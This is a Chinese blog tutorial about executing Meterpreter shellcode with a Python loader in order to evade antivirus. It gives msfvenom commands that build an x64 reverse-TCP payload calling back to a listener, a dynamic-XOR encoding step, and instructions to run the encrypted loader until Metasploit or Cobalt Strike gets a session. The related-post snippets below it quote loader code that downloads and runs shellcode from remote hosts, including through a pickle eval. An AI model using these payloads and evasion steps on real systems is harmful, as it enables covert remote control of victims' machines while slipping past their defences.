利用Python执行ShellCode

最新推荐文章于 2025-05-09 15:07:42 发布
最新推荐文章于 2025-05-09 15:07:42 发布
阅读量740 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: python学习 文章标签: python 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75774378/article/details/130508194
本文介绍了如何使用msfvenom生成64位Windows的Meterpreter反向TCPShellCode,并通过64位Python加载器实现免杀功能。同时,展示了如何用msfvenom生成动态XOR加密的ShellCode,然后使用Shellcode_encryption.exe对ShellCode进行加密处理。最后,在ShellCode_Loader.py中加载加密后的ShellCode,以检查Metasploit或CobaltStrike是否成功上线。

使用Python 64位版加载器

生成x64位的ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.112.216 LPORT=4444 -f py -o shellcode_64.py

 

 使用64位版Python加载器

 MSF监听实现反弹

 

Python加载器实现免杀

msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.163.140 lport=4444 -f c -o shellcode_xor.c

 

 

运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理

D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c

 将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处

 运行ShellCode_Loader.py,确认MSF或CobaltStrike是否上线

 成功!!!

 

python编写shellcode_python生成shellcode加载器
weixin_39763293的博客
12-19 591
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
Python ShellCode
qq_69100706的博客
08-12 538
Python经常被用作编写脚本来辅助分析、自动化任务、破解密码或利用二进制程序的工具。然而,当涉及到Shellcode(一种用于控制系统执行流程的机器码)时,Python通常不是直接执行Shellcode的语言,因为它是一种解释型的高级语言,而Shellcode是直接在目标系统上执行的机器码。尽管如此,Python可以在CTF竞赛中用于生成、编码、解码和测试Shellcode
Python实现免杀Shellcode加载器编写
m0_56187372的博客
12-11 1191
利用python实现免杀shellcode加载器的编写
python加载shellcode
weixin_54005873的博客
09-18 224
【代码】python加载shellcode
python执行shellcode_python exec shellcode
weixin_39620653的博客
12-03 671
前言这里我先吐槽一下,网上用中文搜的python执行shellcode。全部是复制粘贴,棒的我不知道如何下手然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶正文代码我理解不了多少,可能还有错的获取shellcodemsfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py执行shellcode代码如下import c...
python生成shellcode加载器(免杀,可过杀软)
u010508029的博客
05-31 3963
import ctypes, cPickle, base64, urllib2 class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64 class buf(object): def __init__(self, shellcode): sel.
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
本文将探讨如何利用Python来加载和执行shellcode,同时尽可能降低被反病毒软件检测到的风险。Python因其简洁的语法和丰富的库,成为了免杀技术中的常用工具。以下是一些通过Python实现shellcode免杀的方法: **一、...
shellcode loader,bypassav,免杀,一款基于pythonshellcode免杀加载器.zip
08-22
Shellcode是一种小段的代码,通常由漏洞攻击者编写,用于在漏洞被利用执行。在安全领域,shellcode常与恶意软件相关联,因为它可以被用来在目标系统上创建一个命令行shell,从而允许攻击者远程控制受感染的计算机...
python编写shellcode_免杀 - shellcode简单混淆BypassAv
weixin_32539505的博客
02-10 1854
前言在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit环境: Cobalt strike 4.1 Python pyinstaller何为shellcode?百度百科是这样介绍它的:“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获...
shellcodeloader,bypassav,免杀,一款基于pythonshellcode免杀加载器.zip
最新发布
09-15
基于Pythonshellcode免杀加载器,其核心思想是利用Python语言的灵活性和强大的库支持,编写能够处理shellcode并绕过杀毒软件检测的程序。Python语言在安全领域的广泛应用,让其成为开发此类工具的理想选择。该加载...
shellcode_tools:用Python编写的其他工具,主要以shellcode为中心
05-26
Shellcode工具 用Python编写的其他工具,主要集中在shellcode上。 bin2py:将二进制文件嵌入到Python源代码中。 shellcode2exe:将shellcode转换为多个平台的可执行文件。
学习笔记1:python实现shellcode加载器
nglj9527的博客
01-02 6170
python实现shellcode加载器名词解释代码 名词解释 shellcode:一段可以由电脑直接执行的机器码,执行后可以搭建起stranger。 加载器:将shellcode加载进内存,并开始执行的程序。 代码 import ctypes import base64 import requests shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\
python加载shellcode免杀
qq_47289634的博客
06-02 798
以上涉及的代码可以使用Python打包成exe,然后再在Windows系统中执行。这段代码有很多优点,代码里面注释很清楚,每一步都有详细的解释,可随意扩展自己的思路。这两个不管使用哪一个,在PyCharm中运行这段代码都会,上线到CS。下面将介绍1种从远程服务器上加载share code进行上线的方法。复制编码后的结果,保存为1.txt,并把它放到自己的服务器上。上面的代码没有做任何防护,很容易就被杀毒软件识别出来。把1.txt的地址放到下面代码里面,之后运行这段代码。运行之后,依旧可以直接上线CS。
python 执行shellcode_执行shellcode的方法
weixin_39518678的博客
12-05 884
前言进程内存布局需要理解的第一个概念是,整个虚拟内存空间分为两个相关部分:为用户进程保留的虚拟内存空间(用户空间)和为系统进程保留的虚拟内存空间(内核空间),如下所示当处理器读写内存位置时,它使用一个虚拟地址。作为读写操作的一部分,处理器将虚拟地址转换为物理地址。通过虚拟地址访问内存具有这些优点:程序可以使用一个连续的虚拟地址范围来访问物理内存中不相邻的大内存缓冲区程序可以使用一定范围的虚拟地址来...
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1660
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
python加载shellcode免杀 简介
whatday的专栏
10-02 5550
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
【免费下载】 30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
gitblog_06761的博客
05-09 405
本文档详细介绍了使用Python加载shellcode以实现远控免杀的八种方法。所涉及的技术、思路和工具仅供安全学习交流使用。读者需严格遵守法律法规,不得将文中内容用于非法用途或盈利目的。未经授权的使用将自行承担相应后果。 本文档包含以下内容: - 八种Python加载shellcode免杀方法 - 对每种方法的具体实现进行了详细解析 - VT免杀率分析(10-69) 请各位读者在阅读过程中...
Python 执行 shellcode
weixin_30298497的博客
04-11 1112
import urllib2 import ctypes import base64 # 从我们的web服务器上下载shellcode url = "http://rinige.com/shellcode.bin" response = urllib2.urlopen(url) # base64 解码 shellcode shellcode = base64.b64de...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙子煮水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值